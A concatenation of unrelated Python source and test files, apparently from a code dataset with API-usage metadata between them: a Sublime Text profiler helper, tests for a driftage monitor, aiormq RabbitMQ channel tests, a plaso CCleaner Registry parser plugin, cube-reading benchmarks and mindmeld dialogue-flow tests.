:rtype: Callable
"""
@wraps(func)
def _profile_wrapper(*args, **kwargs):
global profiler_running
if not profiler_running:
profiler_running = True
try:
profiler.enable()
return func(*args, **kwargs)
finally:
profiler.disable()
profiler_running = False
return _profile_wrapper
def print_profile_data():
"""
Print the collected profile data.
"""
stream = StringIO()
statistics = Stats(profiler, stream=stream)
statistics.sort_stats('cumulative')
statistics.print_stats()
print(stream.getvalue())
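# --- Usage sketch (not part of the original module) ---------------------------
# Illustrative only; this module imports `sublime`, so it only runs inside
# Sublime Text. A command handler could be profiled like this:
#
#     @profile_func
#     def run_command():
#         sum(range(10 ** 6))
#
#     run_command()
#     print_profile_data()  # prints the cumulative profiling stats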
| [
"profile.Profile",
"functools.wraps",
"pstats.Stats",
"sublime.message_dialog",
"io.StringIO",
"pprint.pprint"
] | [((658, 667), 'profile.Profile', 'Profile', ([], {}), '()\n', (665, 667), False, 'from profile import Profile\n'), ((382, 438), 'sublime.message_dialog', 'sublime.message_dialog', (['"""NimLime running in debug mode."""'], {}), "('NimLime running in debug mode.')\n", (404, 438), False, 'import sublime\n'), ((892, 903), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (897, 903), False, 'from functools import wraps\n'), ((1365, 1375), 'io.StringIO', 'StringIO', ([], {}), '()\n', (1373, 1375), False, 'from io import StringIO\n'), ((1393, 1423), 'pstats.Stats', 'Stats', (['profiler'], {'stream': 'stream'}), '(profiler, stream=stream)\n', (1398, 1423), False, 'from pstats import Stats\n'), ((600, 623), 'pprint.pprint', 'pprint', (['*args'], {}), '(*args, **kwargs)\n', (606, 623), False, 'from pprint import pprint\n')] |
import orjson
from asynctest import TestCase, Mock, patch
from freezegun import freeze_time
from driftage.monitor import Monitor
class TestMonitor(TestCase):
def setUp(self):
self.monitor = Monitor(
"user_test@local", "<PASSWORD>", "identif"
)
def tearDown(self):
self.monitor.container.stop()
def test_should_set_identifier_or_agent_name(self):
self.assertEqual(
self.monitor._identifier,
"identif"
)
monitor = Monitor(
"user_test2@local", "<PASSWORD>"
)
self.assertEqual(
monitor._identifier,
"user_test2"
)
monitor.container.stop()
@patch("driftage.monitor.WaitMonitorSubscriptions")
async def test_should_add_subscription_behaviour(self, behaviour_mock):
self.monitor.add_behaviour = Mock()
await self.monitor.setup()
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock()
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor.collect({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data_with_call(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
| [
"asynctest.Mock",
"asynctest.patch",
"driftage.monitor.Monitor",
"freezegun.freeze_time",
"orjson.dumps"
] | [((711, 761), 'asynctest.patch', 'patch', (['"""driftage.monitor.WaitMonitorSubscriptions"""'], {}), "('driftage.monitor.WaitMonitorSubscriptions')\n", (716, 761), False, 'from asynctest import TestCase, Mock, patch\n'), ((1022, 1047), 'freezegun.freeze_time', 'freeze_time', (['"""1989-08-12"""'], {}), "('1989-08-12')\n", (1033, 1047), False, 'from freezegun import freeze_time\n'), ((1053, 1097), 'asynctest.patch', 'patch', (['"""driftage.monitor.FastNotifyContacts"""'], {}), "('driftage.monitor.FastNotifyContacts')\n", (1058, 1097), False, 'from asynctest import TestCase, Mock, patch\n'), ((1103, 1137), 'asynctest.patch', 'patch', (['"""driftage.monitor.Template"""'], {}), "('driftage.monitor.Template')\n", (1108, 1137), False, 'from asynctest import TestCase, Mock, patch\n'), ((1776, 1801), 'freezegun.freeze_time', 'freeze_time', (['"""1989-08-12"""'], {}), "('1989-08-12')\n", (1787, 1801), False, 'from freezegun import freeze_time\n'), ((1807, 1851), 'asynctest.patch', 'patch', (['"""driftage.monitor.FastNotifyContacts"""'], {}), "('driftage.monitor.FastNotifyContacts')\n", (1812, 1851), False, 'from asynctest import TestCase, Mock, patch\n'), ((1857, 1891), 'asynctest.patch', 'patch', (['"""driftage.monitor.Template"""'], {}), "('driftage.monitor.Template')\n", (1862, 1891), False, 'from asynctest import TestCase, Mock, patch\n'), ((206, 257), 'driftage.monitor.Monitor', 'Monitor', (['"""user_test@local"""', '"""<PASSWORD>"""', '"""identif"""'], {}), "('user_test@local', '<PASSWORD>', 'identif')\n", (213, 257), False, 'from driftage.monitor import Monitor\n'), ((514, 555), 'driftage.monitor.Monitor', 'Monitor', (['"""user_test2@local"""', '"""<PASSWORD>"""'], {}), "('user_test2@local', '<PASSWORD>')\n", (521, 555), False, 'from driftage.monitor import Monitor\n'), ((875, 881), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (879, 881), False, 'from asynctest import TestCase, Mock, patch\n'), ((1274, 1280), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (1278, 1280), False, 'from asynctest import TestCase, Mock, patch\n'), ((2038, 2044), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (2042, 2044), False, 'from asynctest import TestCase, Mock, patch\n'), ((1542, 1649), 'orjson.dumps', 'orjson.dumps', (["{'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}}"], {}), "({'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}})\n", (1554, 1649), False, 'import orjson\n'), ((2298, 2405), 'orjson.dumps', 'orjson.dumps', (["{'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}}"], {}), "({'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}})\n", (2310, 2405), False, 'import orjson\n')] |
import asyncio
import uuid
import pytest
from aiomisc_pytest.pytest_plugin import TCPProxy
import aiormq
async def test_simple(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"foo",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b"foo"
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
async def test_blank_body(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b""
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
@pytest.mark.no_catch_loop_exceptions
async def test_bad_consumer(amqp_channel: aiormq.Channel, loop):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare()
future = loop.create_future()
await channel.basic_publish(b"urgent", routing_key=declare_ok.queue)
consumer_tag = loop.create_future()
async def bad_consumer(message):
await channel.basic_cancel(await consumer_tag)
future.set_result(message)
raise Exception
consume_ok = await channel.basic_consume(
declare_ok.queue, bad_consumer, no_ack=False,
)
consumer_tag.set_result(consume_ok.consumer_tag)
message = await future
await channel.basic_reject(message.delivery.delivery_tag, requeue=True)
assert message.body == b"urgent"
future = loop.create_future()
await channel.basic_consume(
declare_ok.queue, future.set_result, no_ack=True,
)
message = await future
assert message.body == b"urgent"
async def test_ack_nack_reject(amqp_channel: aiormq.Channel):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare(auto_delete=True)
queue = asyncio.Queue()
await channel.basic_consume(declare_ok.queue, queue.put, no_ack=False)
await channel.basic_publish(b"rejected", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"rejected"
await channel.basic_reject(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"nacked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"nacked"
await channel.basic_nack(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"acked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"acked"
await channel.basic_ack(message.delivery.delivery_tag)
async def test_confirm_multiple(amqp_channel: aiormq.Channel):
"""
RabbitMQ has been observed to send confirmations in a strange pattern
when publishing simultaneously where only some messages are delivered
to a queue. It sends acks like this 1 2 4 5(multiple, confirming also 3).
This test is probably inconsequential without publisher_confirms
This is a regression for https://github.com/mosquito/aiormq/issues/10
"""
channel = amqp_channel # type: aiormq.Channel
exchange = uuid.uuid4().hex
await channel.exchange_declare(exchange, exchange_type="topic")
try:
declare_ok = await channel.queue_declare(exclusive=True)
await channel.queue_bind(
declare_ok.queue, exchange, routing_key="test.5",
)
for i in range(10):
messages = [
asyncio.ensure_future(channel.basic_publish(
b"test", exchange=exchange, routing_key="test.{}".format(i),
))
for i in range(10)
]
_, pending = await asyncio.wait(messages, timeout=0.2)
assert not pending, "not all publishes were completed (confirmed)"
await asyncio.sleep(0.05)
finally:
await channel.exchange_delete(exchange)
async def test_exclusive_queue_locked(amqp_connection):
channel0 = await amqp_connection.channel()
channel1 = await amqp_connection.channel()
qname = str(uuid.uuid4())
await channel0.queue_declare(qname, exclusive=True)
try:
await channel0.basic_consume(qname, print, exclusive=True)
with pytest.raises(aiormq.exceptions.ChannelLockedResource):
await channel1.queue_declare(qname)
await channel1.basic_consume(qname, print, exclusive=True)
finally:
await channel0.queue_delete(qname)
async def test_remove_writer_when_closed(amqp_channel: aiormq.Channel):
with pytest.raises(aiormq.exceptions.ChannelClosed):
await amqp_channel.queue_declare(
"amq.forbidden_queue_name", auto_delete=True,
)
with pytest.raises(aiormq.exceptions.ChannelInvalidStateError):
await amqp_channel.queue_delete("amq.forbidden_queue_name")
async def test_proxy_connection(proxy_connection, proxy: TCPProxy):
channel = await proxy_connection.channel() # type: aiormq.Channel
await channel.queue_declare(auto_delete=True)
async def test_declare_queue_timeout(proxy_connection, proxy: TCPProxy):
for _ in range(3):
channel = await proxy_connection.channel() # type: aiormq.Channel
qname = str(uuid.uuid4())
with proxy.slowdown(read_delay=5, write_delay=0):
with pytest.raises(asyncio.TimeoutError):
await channel.queue_declare(
qname, auto_delete=True, timeout=0.5
)
| [
"asyncio.Queue",
"asyncio.wait",
"uuid.uuid4",
"pytest.raises",
"asyncio.sleep",
"aiormq.spec.Basic.Properties"
] | [((257, 272), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (270, 272), False, 'import asyncio\n'), ((1354, 1369), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (1367, 1369), False, 'import asyncio\n'), ((3581, 3596), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (3594, 3596), False, 'import asyncio\n'), ((4831, 4843), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (4841, 4843), False, 'import uuid\n'), ((5774, 5786), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (5784, 5786), False, 'import uuid\n'), ((6250, 6296), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelClosed'], {}), '(aiormq.exceptions.ChannelClosed)\n', (6263, 6296), False, 'import pytest\n'), ((6418, 6475), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelInvalidStateError'], {}), '(aiormq.exceptions.ChannelInvalidStateError)\n', (6431, 6475), False, 'import pytest\n'), ((5936, 5990), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelLockedResource'], {}), '(aiormq.exceptions.ChannelLockedResource)\n', (5949, 5990), False, 'import pytest\n'), ((6930, 6942), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6940, 6942), False, 'import uuid\n'), ((535, 581), 'aiormq.spec.Basic.Properties', 'aiormq.spec.Basic.Properties', ([], {'message_id': '"""123"""'}), "(message_id='123')\n", (563, 581), False, 'import aiormq\n'), ((1629, 1675), 'aiormq.spec.Basic.Properties', 'aiormq.spec.Basic.Properties', ([], {'message_id': '"""123"""'}), "(message_id='123')\n", (1657, 1675), False, 'import aiormq\n'), ((5391, 5426), 'asyncio.wait', 'asyncio.wait', (['messages'], {'timeout': '(0.2)'}), '(messages, timeout=0.2)\n', (5403, 5426), False, 'import asyncio\n'), ((5524, 5543), 'asyncio.sleep', 'asyncio.sleep', (['(0.05)'], {}), '(0.05)\n', (5537, 5543), False, 'import asyncio\n'), ((7020, 7055), 'pytest.raises', 'pytest.raises', (['asyncio.TimeoutError'], {}), '(asyncio.TimeoutError)\n', (7033, 7055), False, 'import pytest\n')] |
# -*- coding: utf-8 -*-
"""Parser for the CCleaner Registry key."""
import re
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import winreg_parser
from plaso.parsers.winreg_plugins import interface
class CCleanerConfigurationEventData(events.EventData):
"""CCleaner configuration event data.
Attributes:
configuration (str): CCleaner configuration.
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:configuration'
def __init__(self):
"""Initializes event data."""
super(CCleanerConfigurationEventData, self).__init__(
data_type=self.DATA_TYPE)
self.configuration = None
self.key_path = None
class CCleanerUpdateEventData(events.EventData):
"""CCleaner update event data.
Attributes:
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:update'
def __init__(self):
"""Initializes event data."""
super(CCleanerUpdateEventData, self).__init__(data_type=self.DATA_TYPE)
self.key_path = None
class CCleanerPlugin(interface.WindowsRegistryPlugin):
"""Gathers the CCleaner Keys for NTUSER hive.
Known Windows Registry values within the CCleaner key:
* (App)Cookies [REG_SZ], contains "True" if the cookies should be cleaned;
* (App)Delete Index.dat files [REG_SZ]
* (App)History [REG_SZ]
* (App)Last Download Location [REG_SZ]
* (App)Other Explorer MRUs [REG_SZ]
* (App)Recent Documents [REG_SZ]
* (App)Recently Typed URLs [REG_SZ]
* (App)Run (in Start Menu) [REG_SZ]
* (App)Temporary Internet Files [REG_SZ]
* (App)Thumbnail Cache [REG_SZ]
* CookiesToSave [REG_SZ]
* UpdateKey [REG_SZ], contains a date and time formatted as:
"MM/DD/YYYY hh:mm:ss [A|P]M", for example "07/13/2013 10:03:14 AM";
* WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels;
* WINDOW_LEFT [REG_SZ]
* WINDOW_MAX [REG_SZ]
* WINDOW_TOP [REG_SZ]
* WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels;
Also see:
http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html
"""
NAME = 'ccleaner'
DATA_FORMAT = 'CCleaner Registry data'
FILTERS = frozenset([
interface.WindowsRegistryKeyPathFilter(
'HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner')])
# Date and time string formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M"
# for example "07/13/2013 10:03:14 AM"
# TODO: determine if this is true for other locales.
_UPDATE_DATE_TIME_RE = re.compile(
r'([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) '
r'([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)')
def _ParseUpdateKeyValue(self, parser_mediator, registry_value):
"""Parses the UpdateKey value.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_value (dfwinreg.WinRegistryValue): Windows Registry value.
Returns:
dfdatetime_time_elements.TimeElements: date and time value or None
if not available.
"""
if not registry_value.DataIsString():
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data type: {0:s}'.format(
registry_value.data_type_string))
return None
date_time_string = registry_value.GetDataAsObject()
if not date_time_string:
parser_mediator.ProduceExtractionWarning('missing UpdateKey value data')
return None
re_match = self._UPDATE_DATE_TIME_RE.match(date_time_string)
if not re_match:
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data: {0!s}'.format(date_time_string))
return None
month, day_of_month, year, hours, minutes, seconds, part_of_day = (
re_match.groups())
try:
year = int(year, 10)
month = int(month, 10)
day_of_month = int(day_of_month, 10)
hours = int(hours, 10)
minutes = int(minutes, 10)
seconds = int(seconds, 10)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(date_time_string))
return None
    if part_of_day == 'PM' and hours != 12:
      hours += 12
    elif part_of_day == 'AM' and hours == 12:
      hours = 0
time_elements_tuple = (year, month, day_of_month, hours, minutes, seconds)
try:
date_time = dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
date_time.is_local_time = True
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(
time_elements_tuple))
return None
return date_time
def ExtractEvents(self, parser_mediator, registry_key, **kwargs):
"""Extracts events from a Windows Registry key.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_key (dfwinreg.WinRegistryKey): Windows Registry key.
"""
configuration = []
date_time = None
for registry_value in registry_key.GetValues():
if not registry_value.name or not registry_value.data:
continue
if registry_value.name == 'UpdateKey':
date_time = self._ParseUpdateKeyValue(parser_mediator, registry_value)
else:
value = registry_value.GetDataAsObject()
configuration.append('{0:s}: {1!s}'.format(registry_value.name, value))
if date_time:
event_data = CCleanerUpdateEventData()
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_UPDATE,
time_zone=parser_mediator.timezone)
parser_mediator.ProduceEventWithEventData(event, event_data)
event_data = CCleanerConfigurationEventData()
event_data.configuration = ' '.join(sorted(configuration)) or None
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
registry_key.last_written_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
winreg_parser.WinRegistryParser.RegisterPlugin(CCleanerPlugin)
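# --- Illustration (not part of the original plugin) ---------------------------
# Illustrative only (requires plaso to be installed): the UpdateKey regular
# expression above splits the documented value format into its components.
if __name__ == '__main__':
  _match = CCleanerPlugin._UPDATE_DATE_TIME_RE.match('07/13/2013 10:03:14 AM')
  print(_match.groups())  # ('07', '13', '2013', '10', '03', '14', 'AM')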
| [
"plaso.containers.time_events.DateTimeValuesEvent",
"re.compile",
"plaso.parsers.winreg_parser.WinRegistryParser.RegisterPlugin",
"dfdatetime.time_elements.TimeElements",
"plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter"
] | [((6270, 6332), 'plaso.parsers.winreg_parser.WinRegistryParser.RegisterPlugin', 'winreg_parser.WinRegistryParser.RegisterPlugin', (['CCleanerPlugin'], {}), '(CCleanerPlugin)\n', (6316, 6332), False, 'from plaso.parsers import winreg_parser\n'), ((2611, 2731), 're.compile', 're.compile', (['"""([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)"""'], {}), "(\n '([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)'\n )\n", (2621, 2731), False, 'import re\n'), ((6092, 6198), 'plaso.containers.time_events.DateTimeValuesEvent', 'time_events.DateTimeValuesEvent', (['registry_key.last_written_time', 'definitions.TIME_DESCRIPTION_WRITTEN'], {}), '(registry_key.last_written_time, definitions\n .TIME_DESCRIPTION_WRITTEN)\n', (6123, 6198), False, 'from plaso.containers import time_events\n'), ((2318, 2412), 'plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter', 'interface.WindowsRegistryKeyPathFilter', (['"""HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner"""'], {}), "(\n 'HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner')\n", (2356, 2412), False, 'from plaso.parsers.winreg_plugins import interface\n'), ((4463, 4541), 'dfdatetime.time_elements.TimeElements', 'dfdatetime_time_elements.TimeElements', ([], {'time_elements_tuple': 'time_elements_tuple'}), '(time_elements_tuple=time_elements_tuple)\n', (4500, 4541), True, 'from dfdatetime import time_elements as dfdatetime_time_elements\n'), ((5709, 5829), 'plaso.containers.time_events.DateTimeValuesEvent', 'time_events.DateTimeValuesEvent', (['date_time', 'definitions.TIME_DESCRIPTION_UPDATE'], {'time_zone': 'parser_mediator.timezone'}), '(date_time, definitions.\n TIME_DESCRIPTION_UPDATE, time_zone=parser_mediator.timezone)\n', (5740, 5829), False, 'from plaso.containers import time_events\n')] |
import time
import pytest
from test import config
from test.cube_utils import CubeUtils
ITERATIONS_NUM = getattr(config, 'iterations_num', 1)
ROUNDS_NUM = getattr(config, 'rounds_num', 10)
class TestDefaultHighRes:
@pytest.fixture(scope="class", autouse=True)
def cube_default(self):
cube_utils = CubeUtils()
cube_utils.generate_cube("default_high_res", 46, 2160, 4320)
yield cube_utils
# ---------------
# Read spatially
# ---------------
@pytest.mark.benchmark(
group="Cube reading for small area spatial analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_135x135(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_spatial, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
@pytest.mark.benchmark(
group="Cube reading for large area spatial analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_2160x2160(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_spatial, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
# ---------------
# Read temporally
# ---------------
@pytest.mark.benchmark(
group="Cube reading for subset temporal analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_46x135x135(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_temporal, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
@pytest.mark.benchmark(
group="Cube reading for global temporal analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_46x2160x2160(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_temporal, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
| [
"pytest.fixture",
"test.cube_utils.CubeUtils",
"pytest.mark.benchmark"
] | [((225, 268), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""class"""', 'autouse': '(True)'}), "(scope='class', autouse=True)\n", (239, 268), False, 'import pytest\n'), ((496, 646), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for small area spatial analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for small area spatial analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (517, 646), False, 'import pytest\n'), ((869, 1019), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for large area spatial analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for large area spatial analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (890, 1019), False, 'import pytest\n'), ((1312, 1459), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for subset temporal analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for subset temporal analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (1333, 1459), False, 'import pytest\n'), ((1686, 1833), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for global temporal analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for global temporal analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (1707, 1833), False, 'import pytest\n'), ((318, 329), 'test.cube_utils.CubeUtils', 'CubeUtils', ([], {}), '()\n', (327, 329), False, 'from test.cube_utils import CubeUtils\n')] |
import pytest
from mindmeld.components import Conversation
def assert_reply(directives, templates, *, start_index=0, slots=None):
"""Asserts that the provided directives contain the specified reply
Args:
directives (list[dict[str, dict]]): list of directives returned by application
templates (Union[str, Set[str]]): The reply must be a member of this set.
start_index (int, optional): The index of the first client action associated
with this reply.
slots (dict, optional): The slots to fill the templates
"""
slots = slots or {}
if isinstance(templates, str):
templates = [templates]
texts = set(map(lambda x: x.format(**slots), templates))
assert len(directives) >= start_index + 1
assert directives[start_index]['name'] == 'reply'
assert directives[start_index]['payload']['text'] in texts
def assert_target_dialogue_state(convo, target_dialogue_state):
assert convo.params.target_dialogue_state == target_dialogue_state
@pytest.mark.conversation
def test_reprocess_handler(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('are there any stores near me?').directives
assert_target_dialogue_state(convo, 'send_store_hours_flow')
assert_reply(directives,
templates="I'm not sure. You haven't told me where you are!")
@pytest.mark.conversation
def test_default_handler(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('Howdy!').directives
assert_target_dialogue_state(convo, 'send_store_hours_flow')
assert_reply(directives,
templates='Sorry, I did not get you. Which store would you like to know about?')
@pytest.mark.conversation
def test_repeated_flow(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
for i in range(2):
directives = convo.process('When does that open?').directives
assert_reply(directives, 'Which store would you like to know about?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('When does that open?').directives
assert_reply(directives, 'Sorry I cannot help you. Please try again.')
assert_target_dialogue_state(convo, None)
@pytest.mark.conversation
def test_intent_handler_and_exit_flow(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('exit').directives
assert_target_dialogue_state(convo, None)
assert_reply(directives, templates=['Bye', 'Goodbye', 'Have a nice day.'])
def assert_dialogue_state(dm, dialogue_state):
for rule in dm.rules:
if rule.dialogue_state == dialogue_state:
return True
return False
def test_dialogue_flow_async(async_kwik_e_mart_app):
@async_kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent')
async def some_handler(context, responder):
pass
assert some_handler.flow_state == 'some_handler_flow'
assert 'some_handler' in some_handler.all_flows
dm = some_handler.dialogue_manager
assert_dialogue_state(dm, 'some_handler')
assert_dialogue_state(dm, 'some_handler_flow')
assert len(some_handler.rules) == 0
@some_handler.handle(intent='some_intent')
async def some_flow_handler(context, responder):
pass
assert len(some_handler.rules) == 1
@some_handler.handle(intent='some_intent_2', exit_flow=True)
async def some_flow_handler_2(context, responder):
pass
assert len(some_handler.rules) == 2
assert 'some_flow_handler_2' in some_handler.exit_flow_states
def test_dialogue_flow(kwik_e_mart_app):
@kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent')
def some_handler(context, responder):
pass
assert some_handler.flow_state == 'some_handler_flow'
assert 'some_handler' in some_handler.all_flows
dm = some_handler.dialogue_manager
assert_dialogue_state(dm, 'some_handler')
assert_dialogue_state(dm, 'some_handler_flow')
assert len(some_handler.rules) == 0
@some_handler.handle(intent='some_intent')
def some_flow_handler(context, responder):
pass
assert len(some_handler.rules) == 1
@some_handler.handle(intent='some_intent_2', exit_flow=True)
def some_flow_handler_2(context, responder):
pass
